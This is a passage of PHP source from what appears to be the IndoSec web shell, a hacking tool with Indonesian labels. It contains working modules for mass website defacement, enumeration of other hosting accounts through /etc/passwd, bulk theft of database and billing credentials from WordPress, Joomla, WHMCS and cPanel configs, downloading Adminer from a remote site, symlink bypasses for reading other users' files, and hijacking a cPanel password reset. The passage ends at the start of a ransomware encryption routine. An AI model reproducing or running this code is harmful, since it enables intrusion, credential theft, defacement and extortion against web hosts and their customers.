  816. } else {
  817. echo "<form method='post'>
  818. <center>
  819. <h5>Tipe :</h5>
  820. <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
  821. <label for='toggle-on' class='butn'>Biasa</label>
  822. <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
  823. <label for='toggle-off' class='butn'>Masal</label>
  824. </center>
  825. <h5><i class='fa fa-folder'></i> Lokasi :</h5>
  826. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
  827. <h5><i class ='fa fa-file'></i> Nama File :</h5>
  828. <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/>
  829. <h5><i class ='fa fa-file'></i> Isi File :</h5>
  830. <textarea name='script' class='form-control' rows='5' placeholder='[Ex] Hacked By { IndoSec }'></textarea><br/>
  831. <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
  832. </form>";
  833. }
  834. exit;
  835. }
  836.  
  837.  
  838.  
  839. /*
  840. Jumping
  841. */
  842. if($_GET['aksi'] == 'jumping') {
  843. $i = 0;
  844. echo "<div class='card container'>";
  845. if(preg_match("/hsphere/", $dir)) {
  846. $urls = explode("\r\n", $_POST['url']);
  847. if(isset($_POST['jump'])) {
  848. echo "<pre>";
  849. foreach($urls as $url) {
  850. $url = str_replace(array("http://","www."), "", strtolower($url));
  851. $etc = "/etc/passwd";
  852. $f = fopen($etc,"r");
  853. while($gets = fgets($f)) {
  854. $pecah = explode(":", $gets);
  855. $user = $pecah[0];
  856. $dir_user = "/hsphere/local/home/$user";
  857. if(is_dir($dir_user) === true) {
  858. $url_user = $dir_user."/".$url;
  859. if(is_readable($url_user)) {
  860. $i++;
  861. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  862. if(is_writable($url_user)) {
  863. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
  864. }
  865. echo $jrw."<br>";
  866. }
  867. }
  868. }
  869. }
  870. if($i == 0) {
  871. } else {
  872. echo "<br>Total ada ".$i." Kamar di ".$ip;
  873. }
  874. echo "</pre>";
  875. } else {
  876. echo '<center>
  877. <form method="post">
  878. List Domains: <br>
  879. <textarea name="url" class="form-control">';
  880. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  881. while($getss = fgets($fp)) {
  882. echo $getss;
  883. }
  884. echo '</textarea><br>
  885. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  886. </form></center>';
  887. }
  888. } elseif(preg_match("/vhosts/", $dir)) {
  889. $urls = explode("\r\n", $_POST['url']);
  890. if(isset($_POST['jump'])) {
  891. echo "<pre>";
  892. foreach($urls as $url) {
  893. $web_vh = "/var/www/vhosts/$url/httpdocs";
  894. if(is_dir($web_vh) === true) {
  895. if(is_readable($web_vh)) {
  896. $i++;
  897. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  898. if(is_writable($web_vh)) {
  899. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
  900. }
  901. echo $jrw."<br>";
  902. }
  903. }
  904. }
  905. if($i == 0) {
  906. } else {
  907. echo "<br>Total ada ".$i." Kamar di ".$ip;
  908. }
  909. echo "</pre>";
  910. } else {
  911. echo '<center>
  912. <form method="post">
  913. List Domains: <br>
  914. <textarea name="url" class="form-control">';
  915. bing("ip:$ip");
  916. echo '</textarea><br>
  917. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  918.  
  919. </form></center>';
  920. }
  921. } else {
  922. echo "<pre>";
  923. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
  924. while($passwd = fgets($etc)) {
  925. if($passwd == '' || !$etc) {
  926. echo "<font color=red>Can't read /etc/passwd</font><br/>";
  927. } else {
  928. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  929. foreach($user_jumping[1] as $user_pro_jump) {
  930. $user_jumping_dir = "/home/$user_pro_jump/public_html";
  931. if(is_readable($user_jumping_dir)) {
  932. $i++;
  933. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  934. if(is_writable($user_jumping_dir)) {
  935. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
  936. }
  937. echo $jrw;
  938. if(function_exists('posix_getpwuid')) {
  939. $domain_jump = file_get_contents("/etc/named.conf");
  940. if($domain_jump == '') {
  941. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  942. } else {
  943. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  944. foreach($domains_jump[1] as $dj) {
  945. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  946. $user_jumping_url = $user_jumping_url['name'];
  947. if($user_jumping_url == $user_pro_jump) {
  948. echo " => ( <u>$dj</u> )<br>";
  949. break;
  950. }
  951. }
  952. }
  953. } else {
  954. echo "<br>";
  955. }
  956. }
  957. }
  958. }
  959. }
  960. if($i == 0) {
  961. } else {
  962. echo "<br>Total ada ".$i." Kamar di ".$ip;
  963. }
  964. echo "</pre>";
  965. }
  966. echo "</div>";
  967. }
  968.  
  969. /*
  970. Config
  971. */
  972. if($_GET['aksi'] == 'config') {
  973. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  974. $con = mkdir("indosec_config", 0777);
  975. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  976. $htc = fopen("indosec_config/.htaccess","w");
  977. fwrite($htc, $isi_htc);
  978. while($passwd = fgets($etc)) {
  979. if($passwd == "" || !$etc) {
  980. echo "<font color=red>Can't read /etc/passwd</font>";
  981. } else {
  982. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  983. foreach($user_config[1] as $user_con) {
  984. $user_config_dir = "/home/$user_con/public_html/";
  985. if(is_readable($user_config_dir)) {
  986. $grab_config =
  987. [
  988. "/home/$user_con/.my.cnf" => "cpanel",
  989. "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
  990. "/home/$user_con/public_html/forum/config.php" => "phpBB",
  991. "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
  992. "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
  993. "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
  994. "/home/$user_con/public_html/admin/config.php" => "OpenCart",
  995. "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
  996. "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
  997. "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
  998. "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
  999. "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
  1000. "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
  1001. "/home/$user_con/public_html/inc/config.php" => "MyBB",
  1002. "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
  1003. "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
  1004. "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
  1005. "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
  1006. "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
  1007. "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
  1008. "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
  1009. "/home/$user_con/public_html/wp-config.php" => "Wordpress",
  1010. "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
  1011. "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
  1012. "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
  1013. "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
  1014. "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
  1015. "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
  1016. "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
  1017. "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
  1018. "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
  1019. "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
  1020. "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
  1021. "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
  1022. "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
  1023. "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
  1024. "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
  1025. "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
  1026. "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
  1027. "/home/$user_con/public_html/configuration.php" => "Joomla",
  1028. "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
  1029. "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
  1030. "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
  1031. "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
  1032. "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
  1033. "/home/$user_con/public_html/site/configuration.php" => "Joomla",
  1034. "/home/$user_con/public_html/main/configuration.php" => "Joomla",
  1035. "/home/$user_con/public_html/home/configuration.php" => "Joomla",
  1036. "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
  1037. "/home/$user_con/public_html/test/configuration.php" => "Joomla",
  1038. "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
  1039. "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
  1040. "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
  1041. "/home/$user_con/public_html/new/configuration.php" => "Joomla",
  1042. "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
  1043. "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
  1044. "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
  1045. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  1046. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
  1047. "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
  1048. "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
  1049. "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
  1050. "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
  1051. "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
  1052. "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
  1053. "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
  1054. "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
  1055. "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
  1056. "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1057. "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
  1058. "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
  1059. "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
  1060. "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
  1061. "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
  1062. "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
  1063. "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
  1064. "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
  1065. "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
  1066. "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
  1067. "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
  1068. "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
  1069. "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
  1070. "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
  1071. "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
  1072. "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
  1073. "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1074. "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
  1075. "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
  1076. "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1077. "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
  1078. "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
  1079. "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
  1080. "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
  1081. "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
  1082. "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
  1083. "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
  1084. "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
  1085. "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
  1086. "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
  1087. "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
  1088. "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1089. "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1090. "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1091. "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
  1092. "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1093. "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
  1094. "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
  1095. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1096. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1097. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1098. "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
  1099. "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
  1100. "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
  1101. "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
  1102. "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
  1103. "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
  1104. "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
  1105. "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
  1106. "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
  1107. "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
  1108. "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
  1109. "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
  1110. "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1111. "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
  1112. "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
  1113. "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1114. "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
  1115. "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
  1116. "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
  1117. "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
  1118. "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
  1119. "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1120. "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
  1121. "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
  1122. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1123. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
  1124. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
  1125. "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
  1126. "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
  1127. "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
  1128. "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
  1129. "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1130. "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
  1131. "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
  1132. "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
  1133. "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
  1134. "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
  1135. "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1136. "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
  1137. "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
  1138. "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
  1139. "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
  1140. "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
  1141. "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
  1142. "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
  1143. "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
  1144. "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
  1145. "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
  1146. "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
  1147. "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
  1148. "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
  1149. "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
  1150. "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
  1151. "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
  1152. "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
  1153. "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
  1154. "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1155. "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
  1156. "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
  1157. "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
  1158. "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
  1159. "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1160. "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
  1161. "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
  1162. "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1163. "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
  1164. "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1165. "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
  1166. "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
  1167. "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
  1168. "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
  1169. "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1170. "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1171. "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
  1172. "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
  1173. "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
  1174. "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
  1175. "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1176. ];
  1177. foreach($grab_config as $config => $nama_config) {
  1178. $ambil_config = file_get_contents($config);
  1179. if($ambil_config == '') {
  1180. } else {
  1181. $file_config = fopen("indosec_config/$user_con-$nama_config.txt","w");
  1182. fputs($file_config,$ambil_config);
  1183. }
  1184. }
  1185. }
  1186. }
  1187. }
  1188. }
  1189. echo "<center><a href='?dir=$path/indosec_config'><font color=lime>Done</font></a></center>";
  1190. }
  1191.  
  1192. /*
  1193. Adminer
  1194. */
  1195. if($_GET['aksi'] == 'adminer') {
  1196. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  1197. function adminer($url, $isi) {
  1198. $fp = fopen($isi, "w");
  1199. $ch = curl_init();
  1200. curl_setopt($ch, CURLOPT_URL, $url);
  1201. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1202. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1203. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1204. curl_setopt($ch, CURLOPT_FILE, $fp);
  1205. return curl_exec($ch);
  1206. curl_close($ch);
  1207. fclose($fp);
  1208. ob_flush();
  1209. flush();
  1210. }
  1211. if(file_exists('adminer.php')) {
  1212. echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
  1213. } else {
  1214. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1215. echo "<center><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center><br/>";
  1216. } else {
  1217. echo "<center><font color=red>gagal buat file adminer</font></center><br/>";
  1218. }
  1219. }
  1220. exit;
  1221. }
  1222.  
  1223.  
  1224. /*
  1225. Symlink
  1226. */
  1227. if($_GET['aksi'] == 'symlink') {
  1228. if(!is_file('named.txt')){
  1229. $d00m = @file("/etc/named.conf");
  1230. }else{
  1231. $d00m = @file("named.txt");
  1232. }
  1233. if(!$d00m) {
  1234. die ("[ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$path&aksi=sym_bypas'>Symlink Bypass</a> ]<br/><font color='red'>Error tidak dapat membaca /etc/named.conf</font><br/><br/>");
  1235. }
  1236. else{
  1237. echo "[ <a href='?dir=$path&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$path&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$path&aksi=sym_bypas'>Symlink Bypass</a> ]<div class='tmp'>
  1238. <table align='center' width='100%'>
  1239. <thead class='bg-info'>
  1240. <th>Domains</th>
  1241. <th>Users</th>
  1242. <th>symlink </th>
  1243. </thead>";
  1244. foreach($d00m as $dom){
  1245. if(eregi("zone",$dom)){
  1246. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1247. flush();
  1248. if(strlen(trim($domsws[1][0])) > 2){
  1249. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1250. flush();
  1251. $site = $user['name'] ;
  1252. @symlink("/","sym/root");
  1253. $site = $domsws[1][0];
  1254. $ir = 'ir';
  1255. $il = 'il';
  1256. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) {
  1257. $site = ".$domsws[1][0].";
  1258. }
  1259. echo "
  1260. <tr>
  1261. <td>
  1262. <a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a>
  1263. </td>
  1264. <td>
  1265. ".$user['name']."
  1266. </td>
  1267. <td>
  1268. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>Symlink</a>
  1269. </td>
  1270. </tr>";
  1271. flush();
  1272. flush();
  1273. }
  1274. }
  1275. }
  1276. echo "</table>
  1277. </div><br/>";
  1278. }
  1279. exit;
  1280. }
  1281.  
  1282. if($_GET['aksi'] == 'symread') {
  1283. echo "read /etc/named.conf";
  1284. echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
  1285. <textarea class='form-control' rows='8' name='file'>";
  1286. flush();
  1287. flush();
  1288. $file = '/etc/named.conf';
  1289. $r3ad = @fopen($file, 'r');
  1290. if ($r3ad){
  1291. $content = @fread($r3ad, @filesize($file));
  1292. echo "".htmlentities($content)."";
  1293. }else if (!$r3ad) {
  1294. $r3ad = @show_source($file) ;
  1295. }else if (!$r3ad) {
  1296. $r3ad = @highlight_file($file);
  1297. }else if (!$r3ad) {
  1298. $sm = @symlink($file,'sym.txt');
  1299. if ($sm){
  1300. $r3ad = @fopen('sym/sym.txt', 'r');
  1301. $content = @fread($r3ad, @filesize($file));
  1302. echo "".htmlentities($content)."";
  1303. }
  1304. }
  1305. echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
  1306. if(isset($_GET['save'])){
  1307. $cont = stripcslashes($_POST['file']);
  1308. $f = fopen('named.txt','w');
  1309. $w = fwrite($f,$cont);
  1310. if($w){
  1311. echo '<br/>save has been successfully';
  1312. }
  1313. fclose($f);
  1314. }
  1315. exit;
  1316. }
  1317.  
  1318. if ($_GET['aksi'] == 'sym_404'){
  1319. echo '<h2>Symlink 404</h2>
  1320. <form method="post">
  1321. File Target: <input type="text" class="form-control" name="dir" value="/home/user/public_html/wp-config.php"><br>
  1322. Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
  1323. <input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
  1324. </form>';
  1325. if($_POST['execute']){
  1326. rmdir("indosec_sym404");
  1327. mkdir("indosec_sym404", 0777);
  1328. $dir = $_POST['dir'];
  1329. $isi = $_POST['isi'];
  1330. system("ln -s ".$dir."indosec_sym404/".$isi);
  1331. symlink($dir,"indosec_sym404/".$isi);
  1332. $inija = fopen("indosec_sym404/.htaccess", "w");
  1333. fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any");
  1334. echo'<a href="/indosec_sym404/" target="_blank"> >>Sukses<< </a>';
  1335. }
  1336. exit;
  1337. }
  1338.  
  1339.  
  1340. if ($_GET['aksi'] == 'sym_bypas'){
  1341. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  1342. $cont = stripcslashes($_POST['file']);
  1343. if(!file_exists('passwd.txt')){
  1344. $f = @fopen('passwd.txt','w');
  1345. $w = @fwrite($f,$cont);
  1346. fclose($f);
  1347. }
  1348. if($w or @filesize('passwd.txt') > 0){
  1349. echo "<div class='tmp'>
  1350. <table width='100%'>
  1351. <thead class='bg-info'>
  1352. <th>Users</th>
  1353. <th>symlink</th>
  1354. <th>FTP</th>
  1355. </thead>";
  1356. flush();
  1357. $fil3 = file('passwd.txt');
  1358. foreach ($fil3 as $f){
  1359. $u=explode(':', $f);
  1360. $user = $u['0'];
  1361. echo "<tr>
  1362. <td class='left'>$user</td>
  1363. <td>
  1364. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  1365. </td>
  1366. <td>
  1367. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  1368. </td>
  1369. </tr>";
  1370. flush();
  1371. flush();
  1372. }
  1373. die ("</tr></table></div>");
  1374. }
  1375.  
  1376. }
  1377.  
  1378. echo "read /etc/passwd";
  1379. echo "<br/><form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
  1380. <textarea class='form-control' rows='8' name='file'>";
  1381. flush();
  1382. $file = '/etc/passwd';
  1383. $r3ad = @fopen($file, 'r');
  1384. if ($r3ad){
  1385. $content = @fread($r3ad, @filesize($file));
  1386. echo "".htmlentities($content)."";
  1387. }elseif(!$r3ad) {
  1388. $r3ad = @show_source($file) ;
  1389. }elseif(!$r3ad) {
  1390. $r3ad = @highlight_file($file);
  1391. }elseif(!$r3ad) {
  1392.  
  1393. for($uid=0;$uid<1000;$uid++){
  1394. $ara = posix_getpwuid($uid);
  1395. if (!empty($ara)) {
  1396. while (list ($key, $val) = each($ara)){
  1397. print "$val:";
  1398. }
  1399. print "\n";
  1400. }
  1401. }
  1402. }
  1403. flush();
  1404. echo "</textarea><br/>
  1405. <input type='submit' class='btn btn-danger btn-block' value='Symlink'/><br/>
  1406. </form>";
  1407. flush();
  1408. exit;
  1409. }
  1410.  
  1411.  
  1412. if ($_GET['aksi'] == 'resetpasscp') {
  1413. echo '<br/><h5 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h5>
  1414. <form method="POST">
  1415. <div class="form-group">
  1416. <input type="email" name="email" class="form-control" placeholder="Masukan Email..."/><br/>
  1417. <input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>
  1418. </div>
  1419. </form>';
  1420.  
  1421. if(isset($_POST['submit'])){
  1422. $user = get_current_user();
  1423. $site = $_SERVER['HTTP_HOST'];
  1424. $ips = getenv('REMOTE_ADDR');
  1425. $email = $_POST['email'];
  1426. $wr = 'email:'.$email;
  1427. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  1428. fwrite($f, $wr);
  1429. fclose($f);
  1430. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
  1431. fwrite($f, $wr);
  1432. fclose($f);
  1433. $parm = $site.':2082/resetpass?start=1';
  1434. echo '<br/>Url: '.$parm.'';
  1435. echo '<br/>Username: '.$user.'';
  1436. echo '<br/>Success Reset To: '.$email.'<br/><br/>';
  1437. }
  1438. exit;
  1439. }
  1440.  
  1441.  
  1442.  
  1443. if ($_GET['aksi'] == 'ransom') {
  1444. echo '<form method="post">
  1445. <div class="form-group">
  1446. <label>Directory Yang Ingin diencrypt</label>
  1447. <input type="text" name="path" class="form-control mb-2" value="'.$dir.'">
  1448. <input type="submit" name="encrypt" class="btn btn-danger btn-block" value="Encrypt"/>
  1449. </div>
  1450. </form>';
  1451.  
  1452. if(isset($_POST["encrypt"])) {
  1453. $dir = $_POST["path"];
